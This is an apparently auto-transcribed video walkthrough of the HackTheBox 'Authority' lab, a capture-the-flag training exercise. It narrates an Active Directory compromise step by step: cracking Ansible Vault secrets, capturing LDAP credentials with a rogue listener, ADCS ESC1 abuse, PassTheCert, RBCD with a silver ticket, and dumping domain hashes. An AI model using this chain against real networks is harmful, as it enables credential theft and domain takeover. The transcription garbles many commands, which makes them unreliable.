HackTheBox - Authority
Key Takeaways
The video demonstrates a cybersecurity attack on a Windows server using various tools and techniques, including nmap, Hashcat, and Impacket, to gain administrator access and exploit vulnerabilities.
Full Transcript
what's going on YouTube this is ipack we do an authority from hack the box which starts off with pillaging SMB shares and you find a bunch of anable playbooks and the playbooks themselves use anable vault which encrypts some information but you can crack them over in hashcat get the password to decrypt and that leaks some passwords they use to set up the server most notably the password to access the pwm management interface this is like a self-service password reset type of thing but once you get in the management interface you can test the ldap connection you can insert your own ldap server and have it connect back to you so you steal the ldap password and that gets you credentials to the Windows server from there you can do one of the um active directory certificate exploits the adcs um this one is the esc1 we have to create a machine account and then we can use that machine account in order to um become administrator so with that being said let's just jump in as always we're going to start with the end map so DC for defa scripts SV enumerate versions OA output all formats put the end map directory and call it Authority then the IP address of 1010 111222 this kind take some time to run so I've already ran it looking at the results we have quite a few ports open it looks like 13 uh the first one being DNS and it says simple DNS plus so I'm thinking this is going to be active directory already I'm skipping down I see ldap ldap s and I'm guessing curb Roose is going to be listening as well somewhere uh let's see oh yeah up here kback so we definitely have a active directory server so I'm just going to look for ports that stand out like HTTP that's just going to be IIs um we do have ldap it gives us a DNS of authority. hb. Corp the DNS of htb docp so let's start adding things to our host file as we go so sudo VI ATC host and then we can go 1010 11222 to Authority hb. core let's give it Authority as well going to do authority. htb I always like giving it every combination that we can of the name so scrolling down more SSL stuff lots of SSL we also have 8443 and this is going to a website SL pwm and that may be it so one thing I like doing whenever I have Windows is just do a quick um net exec which is the new version of crack map exec so we can do this 10 11222 and I just like this because it gives me or at least confirms the domain name and the name and oddly enough we have the domain being authority. htb and the name being Authority I don't see any do Corp which is a little odd um and it's also looks odd with both the name and the domain being Authority generally you see that if it is a domain controler being like DC dc01 so this Box's name is Authority the domain is authority. htb so we have all of the names so I'm going to go to 1011 222 I have 111 and this is the iws page if we go to 8443 it want SSL going over here takes a while to load I'm going to press F12 look at my Network Tools when I reload just want to see if it's hung somewhere it is getting blocked why does this blocked uhhuh it loaded eventually why binding abort no I wonder if it wants Authority htb 8443 accept this does this page load any quicker is this in console I'm just going to try like authority. Authority if that doesn't work we'll just move on I don't know exactly why it's going slow it's probably loading some main name uh let's see what name does the certificate think it is common name 17216 that's not going to work so I'm guessing the IP address changed from when the machine was created and it may think that's the IP and throwing some weird errors but looks like everything works it just goes a little bit slow we have a username and password field and then two things the um configuration manager we can c a username SBC pwm uh users we don't have any password we could try brute forcing the password but if we do um we risk locking things out right so don't like ever doing that we go to configuration editor um is that what we went to I thought I clicked the first one here okay they both look the same so it wants a password I'm going to try admin and see if we get in but we don't uh try admin here as well so all we get so far is a usern name of SVC pwm so you can close these out and let's check SMB so if we do a net exec SMB -- shares we can see um it's not letting us in but odly enough if we do a invalid username password it logs in I forget exactly what type of login this is I don't think it's an null session maybe it's guest um but whatever this defaults do when you have an invalid password it logs in I think if you don't specify anything it's all session and then if you do I forget what it is but we can see we have read access over the development share so so I could use the spider plus module and crawl it but I could also just go straight to SMB client uh because I forgot the syntax to the spider plus but I know this one so let's go this way and if you want to I'm sure if we went to ic. rocks um spider plus you could go to plenty of other videos where we do that so development do a dir we have an automation directory uh anable directory and a bunch of files I'm going to go up to directories I'm going to type recurse on and then I'm also going to type prompt and this is just going to make sure the next thing doesn't prompt me every time I want to download something so I do M Star it's going to just automatically download every file here if I didn't type prompt it would ask me for every single file if I'm sure I want to copy it which is annoying if I don't do recurse it's just going to I think make the directory and stop it's not going to go in and download all the files right so this is going to download everything if I look at this directory now we have automation anable I'm going to start looking at things while it downloads um I'm going to open up in Visual Studio code just because it makes navigating around this a little bit easier uh there we go I was wondering where it was so I'm guessing this is going to be some vs code modules of or not V Cod modules anable modules of deploying everything right we have adcs so this is going to be um active directory certificate Services maybe Robert debok is another user um ldap is probably going to configure ldap pwm that's the website we were and share this could be the file share right um we have C and share internal is there like a development share is that what we connected to I don't see it um let's see yeah I definitely don't see anything about a development share that is what we connected to right SMB client it is so maybe these anable things are out of date or it's not for this domain but it is the similar Technologies if we look at the configuration variables we have a potential password of super secret uh we could try like crack map exact logging in with super secret as the password for I guess SVC pwm is the only thing but I don't want to waste your time showing you it does not work but that is what I would be doing if I hadn't solved this box before so clicking around you can just kind of look at what things are I like looking at all the variables first so let's go here default um if there is a vars directory I would look at that as well don't see anything there that looks standard and we look for is any like um hardcoded credentials so hardcoded credentials generally will be in your variable files so defaults is the default variable and vers is another place to store variables so it's not an ldap let's go to pwm if we go here we can see something right off the bat we have pwm admin login admin password um ldap admin password so we have three different ones let's save each of these um it's a bit of a pain to save these because the um John module about to do doesn't allow U multiple things pered line so we just have to do them one by one so this will be pwm admin login admin login do this replace all like that said command I did was just um getting rid of spaces so we can do pwm admin password next and add this okay and let's go to the next one copy this okay so now I can do like a locate anible to John where is that stall it is here so we can do that on let's see we'll do pwm admin login pwm admin password and ldap okay let's just direct this to a file of um anable does so now we have this let's copy it over to the Kraken and this is just a another box I have on my network um you can do it anywhere I recommend doing it on your host it's just easier for me in videos to do it off this machine um we do hashcat slashes there we go and then let's go in hashcat and we can do slash cat and I'm going to guess we have to add the username flag because it put the file name before the hash um and then we just specify hashes anible do hases and then the word list of rock you text and let's see if it automatically detects a mode it's probably going to detect it as some type of hash cat crack there we go 16900 anable Vault password manager and it is starting up to uh crack I don't know exactly okay there we go I was wondering why the run times were taking a little bit of time and we got one two and all three have cracked so I'm just going to do a D- show after you get rid of the word list and we can see everyone is the same password so I'm going to go and try this password on the password Service uh inactivity that is annoying let's just go here configuration manager that loaded actually pretty quickly type this password and password incorrect so let's try actually um grabbing the data so let's go back here and let's see um let me exit hashcat put the password back on my clipboard beds. text um anable vault okay so I'm going to C this and then let's pipe it over to ansible-vault decrypt put in the password and we get the first credential so let's say um the creds this will be L app admin password is that okay okay let's go to the next file and this is ldap admin login uh no password or no admin password oh pwm admin login I always hate copying out of Vim so that's why you see me exit to grab that so we also have the SVC pwm user and that password is oh that is not a password that is the login so let's now get the pwm admin password and we have the credential okay so let's try net exac so we can do net exac SMB dasu SVC PW and-b for the password uh we probably have to put that in quotes because bash did funky things with like the exclamation points and things see we need to give it a Target 10 10 11222 uh let's see SMB a Target then protocol that doesn't look right it's protocol then Target there we go and we can log in but we can't really download anything we can also do a D- shares to see if there's anything else we can see now cuz remember there were two two shares and access denied oh the saying we could log in is probably going to be um that weird thing where we did the invalid user and we could still see a directory um if you give it a valid username it's still going to say that's successful right so here we have this let's see success if I give something that doesn't exist there it should still say success yep so it's treating everything as a success so we don't actually have the password we can try this password on the web service so do this and we can log in so let's see we could try downloading the configuration and let's save this to I guess downloads and move it so let's do CP downloads pwm configuration uh cat this or let's GP for SBC uncore because that's how the username was we have SVC ldap so if we look at this I'm just looking around it to see if there's a password we can search this for password uh grap dasi password on pwm and nothing looks like a password but we do have a new user SVC l so what I'm going to do is let's try net exec let's do SVC l. will this say we logged in we don't so now we actually have a um valid user account the SVC pwm that probably wasn't a valid user account every invalid user is treating it as a successful login but this is not so let's go back to our creds and we can try the ldap admin password so let's paste this in and it doesn't work we can also try the pwm password uh maybe I typo that I really don't think that was PW that may have been pwm yeah that's probably it do invalid thing here nope still treats everything as a success okay so we don't have any credential so let's see what else we can do in this thing there were two places we could go right we did the configuration manager let's go to configuration editor and it's not asking for a password because we already entered that one time so if I go to ldap settings Global see no let's do directories default connection I'm trying to find this right I want to get the password out of this so we have the elap user the proxy the password is stored it doesn't look like the website is telling us the password of that account um if we go here I was just looking in the source code sometimes you'll see it like hidden around this but that doesn't really happen nowadays anymore um but we can add more ldap URLs so let's add one and I'm going to point it at myself we do ldap colon 101148 which is my IP and we do 389 okay and then we can do pseudo n cvnp 389 and when we do test ldap profile it comes back to us and the password is ldap in the clear um it's kind of hard to see we could also do l. out um let's see it should connect again right from unknown there we go by cat l do.out we see it there and that will let us xxd it and we can see there's two um like unknown characters this is just separating the value of htb so it becomes a little bit more clearer there but really the best way to do it is going to be responder right whenever it comes to like manand the Milling anything from a Windows computer I use responder so we can do responder - capital I ton Z and if we look the ldap server is on I wonder what if we're listening on secure ldap LP let's see 389 it's like a six something 1433 is that let's see I don't think 1433 is secure L app uh let's do l l app authority. nmap 1433 no it would be like 636 so I don't think responder supports ldap s maybe it does but let's go and do test l. profile now and we can see um this spits it out pretty clearly it parses the packet and gives us the credential so SVC ldap is ldap in the clear so let's go back to net exec so net exec SMB 10101 222- SVC l-p put in the password and we can also add it to our creds uh we have it open somewhere let's see as we see OD app fix or stupid typo there we go and let's see I just want to make sure it says invalid login when we change that so we don't have SMB access uh we could do D- shares now and see if there's any new thing we can read we can now read the department share so if I do SB client D SVC ldap 101 11222 uh Department shares if I put this in quotes will that connect me uh capital u password where is elep in the clear di uh recurse [Music] on prompt M get star so now that's going to download everything I don't think we have to because this is looking very much like um this right it HR R&D it already downloaded uh let's see I don't think it was in recurse mode or those are empty it's going to download anything oh God I did Di and since rer is on it tries to download everything so this is a blank share and I should have went into a directory before doing this because it kind of clobbered my working structure um so let's see well the Box name is Authority so we could probably go for um certify but before I do certify I want to check one last thing see C creds I normally test like when RM as well we can test other protocols with this um at exec when RM and make sure that doesn't let us log in and it does so we could log in with winrm here so we could do Evo wm- I uh 10101 222- um SVC l-p that password and and we get logged in and this can get us the user flag probably right there we go um but whenever I check for any type of adcs vulnerability I don't like doing it on a Windows box primarily because when I'm doing pen testing you do it from a Windows it's going to be net and it generally gets caught when you um run it there it's much much easier to just run it from your box and there is a tool called certify that does a really really great job so I'm going to do certify find- the username SVC l-p put in the password and then we give it the target which is authority. htb to give it text standard out and show me vulnerable this will take a couple seconds to run and it failed to connect to remote registry but then it eventually did it and we have the vulnerabilities um esc1 and it's because uh we can um enrolled computers can Target this one so we need a computer account to do this um the easiest way is just to create our own but before we do that we should make sure we can create accounts so let's go back to our net exact command we'll do SMB and if you do A- capital l it's going to list all the modules of SMB and let's see maybe it's ldap we want let's do ldap there we go and we want the module maq this is going to retrieve the machine account quota uh we also need to specify our username so I'm going to grab this just in case we don't have it actually and copy both of these and we should be able specify the names after the module right doesn't matter the order the arguments are in and we can see service ldap has a machine quota of 10 which means I can add 10 computers to The Domain why this is a default thing in act directory where pretty much any user can add computers I'm not exactly sure um but this will let us add a computer and generally when you add add the computer the password is randomized so you don't know it but when you use the impacket script to add the computer you can specify the password so let's do um add computer and we'll specify the account we want to authenticate with so Authority SVC ldap uh the method we want to use is going to be ldap secure the computer name we'll call this um IPC and the computer pass will be Please Subscribe exclamation point1 and I did that just for password complexity um we'll do one bang There we go and then- DCI I 1010 11222 so this will add us the computer IPC uh paste in the password I had 10 on my clipboard let's grab ldap in the clear I bet if I did a colon after SVC odap maybe that's how we [Music] um Can what is it put a password in so now that we have this we can do the certify account or attack so we can do certify request username ipac and the computer names end in a dollar Das password please subscribe one bang and then after that we want to give it the authority DCA normally it's going to be um The Domain then- CA then D DCI I 10 10 11 222 and I'm sure certify also told us that right or is certify okay so that did give us that uh we want the template name of Corp VPN right yeah so we did dcip then template Corp VPN DN uh we're going to become administrator at authority. htb I think that's it and you could get those flags while that goes um if we did like Spectre Ops um esc1 this will probably be a good talk that pretty much has most of that net buyers timed out there we go I don't know why it didn't work the first time but it did work the second time so we have the administrator certificate at administrator. pfx and I just did administrator because the default um administrator for most Windows computers is named administr right uh we could test if that guy existed with crackap exact so if we did net exact [Music] um administrator like this it should fail to log in right because we're getting login failures before when we did this yep there we go so we know administrator is a valid user because if the user didn't exist like administrat it will say success so we know that user does exist we could also use a tool like curb root or something like that to enumerate valid usernames if the director uh ad server didn't have this weird configuration I wish I remembered um what did that but we do have that administrator. pfx file so the next step will be to try to authenticate with it so we can do certify off pfx um administrator. pfx and we get this I bet if we search this page let's see if we Google this with s pi maybe this is a new post let's see go here and it says when a domain controller doesn't have certificate installed for smart cards you'll probably get this error message and it does tell us we can use pass the certificate to get around this so let's grab this uh application so we'll do get clone pass the sht and man our directory is awful but let's go and pass theer they do have a Python and it's just pass the shirt. py so I'm going to copy that up to directory since there's no libraries that way I just don't have to specify pirt python to run things um let's see let's clean up some of these directories accounting Finance HR it marketing operations R&D sales okay that's a little better um so to use past theer we will have to um breaker certificate because it has a key and aert into just separate files so we can do certify D pfx administrator D noer out administrator. key so now that took the um key out of this group of certificates and just put it in its own file so the next thing we can do is pretty much the same thing except instead of noer we do no key- out administrator. CRT so we have now just extracted both the certificate and key from the pfx file and that will enable us to do a past theer so we'll do Python 3 pass theer dopy um- action l app shell specify the certificate of administrator doert the key administrator. key then domain authority. htb and I always specify dcip and this is an impacket script so we'll find out very soon uh no route to host because I forgot A2 we can do help and there's not many users here and U not users um arguments and that's because my impacket is out of date we can see it's from 2020 we would know that if we looked at this so if I did L pass theer dopy um it's getting the ldap uh shell from just impacket examples ldap shell so let's install a more recent version of impac it so I'm just going to impac it on Google and I'm going to specify GitHub let's download it we can do a get clone of this we can go into impacket um actually before I do that python 3-m vm. VM so that's going to create us a Python 3 virtual environment Go in impacket do pip 3 install Dot and this will install impacket to this virtual environment and this will be the new version of packet so when we run the ldap shell it's going to have a lot more options so let's just hit up same exact command I had ran before but this time our impacket is a newer version 2023 instead of 2020 I do help and we have a lot of options so the option that sticks out most to me is going to be add user to group right so if we run this uh not enough values expected two um um let's just try SBC ldap administrators and it says the result was okay so now let's do a um PS exac we can say SVC ldap at 1010 11222 uh PS exact. Pi based in the password requesting share uploading starting and we radmin right we could also do like when RM or do anything to get this so that is the super easy way to do it but it does have other ways we could do it because again we are ldap right so that enables us to um change any flag we want um I think set rbcd was the intended way so if we run on this it expects to we want the Target and the grantee so I'm going to give it the target of authority like this and this is going to be the machine name remember the machine uh host name was Authority normally it's going to be like DC or dco1 but it's Authority in this case and we'll give it ipac and it does not look like it added it so maybe like a machine cleanup script has deleted the ipac machine uh let's do add computer let's see uh creds I want to see do I remember this right is it colon the password hey that's how you do it an in packet awesome um I always forget that so we can do what was I next uh we want to do pass the SE that's right so that's going to get us in the ldap shell and then do the set rbcd um Authority IPC like that and what we did is allowed IPC to impersonate users on Authority via s42 proxy so essentially this just means ipet can um have delegation so it becomes a domain controller so what we're going to do is a get silver ticket and we can say we want a server ticket of cifs authority. authority. htb so we're saying this guy has signed her ticket and he signed us to be administrator and we're going to specify the target so this is going to be the account we authenticate as so we do authority. htb because that's the domain then we can say IAC dollar CU that's our computer and then please subscribe $1 because that's the password to our computer account so when we do this uh clock skew to great let's do pseudo ntp date 101 11222 um so this was just a curos error that our clock was out of sync with the target maybe that's why like it didn't work one time no that was really far out didn't sync holy crap that time let's try running this again okay so now we have the administrator. ccache so this is going to enable us to just become administrator so let's do KB 5cc name is equal to administrator. cach and um let's see let's just do a secret stump we can do Secret stump. p-k uh no pass authority. htb administrator at uh authority. htb and let's just say d the ntlm uh that did not work uh maybe we have to give it the authority. authority the fully qualified name there we go and there we have it dumping all the creds so that's going to be the Box hope you guys enjoyed it take care and I will see you all next time
Original Description
00:00 - Introduction
00:58 - Start of nmap
03:30 - Taking a look at the website
05:50 - Using NetExec to search for file shares and discovering the Development share is open. Using smbclient to download everything
08:00 - Exploring the Ansible Playbooks in the Development Share to discover encrypted passwords (ansible vault)
10:00 - Converting the Ansible Vault Hashes to John/Hashcat format so we can crack them
13:30 - Decrypting the values and getting some passwords, one of which lets us log into PWM (webapp)
19:50 - Adding a rogue ldap server into the PWM Config, then clicking test config will send us the password for the ldap account
27:00 - Running Certipy to find the server is vulnerable to ESC1, we just need to enroll a computer
28:00 - Using NetExec to show how the MachineAccoutnQuote, confirming we can enroll machines
29:00 - Using Impacket to add a rogue computer
30:00 - Using Certipy to perform the ESC1, it works but smart card login isn't enabled so we can't log in right away.
33:30 - Looking at the error message, finding we can PassTheCert to LDAP which then will let us get admin
37:15 - Using PassTheCert to add ourselves to the Domain Administrator group
39:25 - Showing PassTheSert to set_rbcd, which will enable our rogue computer the ability to sign krb, allowing us to impersonate the administrator
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: AI Security
View skill →Related AI Lessons
Chapters (15)
Introduction
0:58
Start of nmap
3:30
Taking a look at the website
5:50
Using NetExec to search for file shares and discovering the Development share
8:00
Exploring the Ansible Playbooks in the Development Share to discover encrypted
10:00
Converting the Ansible Vault Hashes to John/Hashcat format so we can crack the
13:30
Decrypting the values and getting some passwords, one of which lets us log int
19:50
Adding a rogue ldap server into the PWM Config, then clicking test config will
27:00
Running Certipy to find the server is vulnerable to ESC1, we just need to enro
28:00
Using NetExec to show how the MachineAccoutnQuote, confirming we can enroll ma
29:00
Using Impacket to add a rogue computer
30:00
Using Certipy to perform the ESC1, it works but smart card login isn't enabled
33:30
Looking at the error message, finding we can PassTheCert to LDAP which then wi
37:15
Using PassTheCert to add ourselves to the Domain Administrator group
39:25
Showing PassTheSert to set_rbcd, which will enable our rogue computer the abil
🎓
Tutor Explanation
DeepCamp AI